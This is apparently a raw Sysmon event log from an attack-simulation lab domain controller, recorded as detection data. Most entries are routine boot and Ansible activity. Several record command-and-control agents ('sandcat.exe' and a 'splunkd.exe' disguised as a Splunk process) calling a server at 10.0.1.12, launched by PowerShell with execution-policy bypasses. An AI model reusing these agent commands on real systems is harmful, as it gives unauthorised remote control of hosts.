13:22:06.520{A8622C2F-3DFE-6078-2900-00000000AE01}2744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C evkllvC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DF3-6078-2300-00000000AE01}2904C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 154100x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:06.469{A8622C2F-3DFE-6078-2800-00000000AE01}2016C:\Windows\System32\spoolsv.exe10.0.14393.4169 (rs1_release.210107-1130)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=87E844BD124333302C9DCF947D98B3A3,SHA256=4C3316B6F7671B2E859B2BC98702C7973FB9BC7A6EA71EDB6ACDFE2CF23EB7A0,IMPHASH=A40033EBEE6E37CE4B1D96B817E1BCC7{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:59.944{A8622C2F-3DF7-6078-2600-00000000AE01}3024C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:58.217{A8622C2F-3DF6-6078-2500-00000000AE01}2972C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DEE-6078-1A00-00000000AE01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 154100x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:55.439{A8622C2F-3DF3-6078-2300-00000000AE01}2904C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{A8622C2F-3DEE-6078-1900-00000000AE01}2092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 154100x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:21:50.398{A8622C2F-3DEE-6078-1200-00000000AE01}1196C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{A8622C2F-3DEE-6078-C0C3-000000000000}0xc3c01SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{A8622C2F-3DEB-6078-0900-00000000AE01}780C:\Windows\System32\winlogon.exewinlogon.exe 154100x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.390{A8622C2F-3DEE-6078-1100-00000000AE01}1164C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{A8622C2F-3DEE-6078-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.370{A8622C2F-3DEE-6078-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{A8622C2F-3DEE-6078-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 
154100x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:50.348{A8622C2F-3DEE-6078-0E00-00000000AE01}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3bef855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{A8622C2F-3DEB-6078-0900-00000000AE01}780C:\Windows\System32\winlogon.exewinlogon.exe 154100x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:49.980{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:48.143{A8622C2F-3DEC-6078-0B00-00000000AE01}840C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{A8622C2F-3DEB-6078-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 154100x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:48.073{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{A8622C2F-3DEB-6078-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 154100x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.940{A8622C2F-3DEB-6078-0900-00000000AE01}780C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{A8622C2F-3DEB-6078-0600-00000000AE01}688C:\Windows\System32\smss.exe- 154100x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.866{A8622C2F-3DEB-6078-0700-00000000AE01}696C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{A8622C2F-3DEB-6078-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 154100x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.868{A8622C2F-3DEB-6078-0800-00000000AE01}704C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{A8622C2F-3DEB-6078-0600-00000000AE01}688C:\Windows\System32\smss.exe- 154100x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.863{A8622C2F-3DEB-6078-0600-00000000AE01}688C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c C:\Windows\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 154100x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:21:47.727{A8622C2F-3DEB-6078-0500-00000000AE01}624C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{A8622C2F-3DEB-6078-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 154100x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:47.598{A8622C2F-3DEB-6078-0400-00000000AE01}616C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 154100x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:45.845{A8622C2F-3DE9-6078-0300-00000000AE01}572C:\Windows\System32\autochk.exe10.0.14393.4283 (rs1_release.210303-1802)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A782E5C76170546278F1654332F3DA46,SHA256=CCA83B3DDE1DACFB121299E9468D52D57582E805F273234166F5EB001543AC31,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 04/15/2021 01:21:15 PM LogName=System SourceName=Microsoft-Windows-Kernel-General EventCode=1 EventType=4 Type=Information ComputerName=win-dc-281.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-19 SidType=0 TaskCategory=5 OpCode=Info RecordNumber=89557 Keywords=Time Message=The system time has changed to ‎2021‎-‎04‎-‎15T13:21:15.146000000Z from ‎2021‎-‎04‎-‎15T13:21:15.147122400Z. Change Reason: An application or system component changed the time. 154100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:14.285{A8622C2F-3DCA-6078-E702-00000000AD01}3892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DCA-6078-60AF-100000000000}0x10af600HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DCA-6078-E602-00000000AD01}4548C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 
154100x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:14.280{A8622C2F-3DCA-6078-E602-00000000AD01}4548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DCA-6078-60AF-100000000000}0x10af600HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DCA-6078-E402-00000000AD01}4420C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:14.210{A8622C2F-3DCA-6078-E402-00000000AD01}4420C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DCA-6078-60AF-100000000000}0x10af600HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.731{A8622C2F-3DC8-6078-E302-00000000AD01}1344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® 
Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC8-6078-6390-100000000000}0x1090630HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC8-6078-E202-00000000AD01}3548C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.725{A8622C2F-3DC8-6078-E202-00000000AD01}3548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC8-6078-6390-100000000000}0x1090630HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC8-6078-E002-00000000AD01}4228C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:21:12.657{A8622C2F-3DC8-6078-E002-00000000AD01}4228C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC8-6078-6390-100000000000}0x1090630HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.388{A8622C2F-3DC8-6078-DF02-00000000AD01}3968C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{A8622C2F-3DC8-6078-DE02-00000000AD01}2448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.246{A8622C2F-3DC8-6078-DE02-00000000AD01}2448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile 
-NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC8-6078-DD02-00000000AD01}4708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 154100x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.108{A8622C2F-3DC8-6078-DD02-00000000AD01}4708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC8-6078-DC02-00000000AD01}4300C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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 154100x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.102{A8622C2F-3DC8-6078-DC02-00000000AD01}4300C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 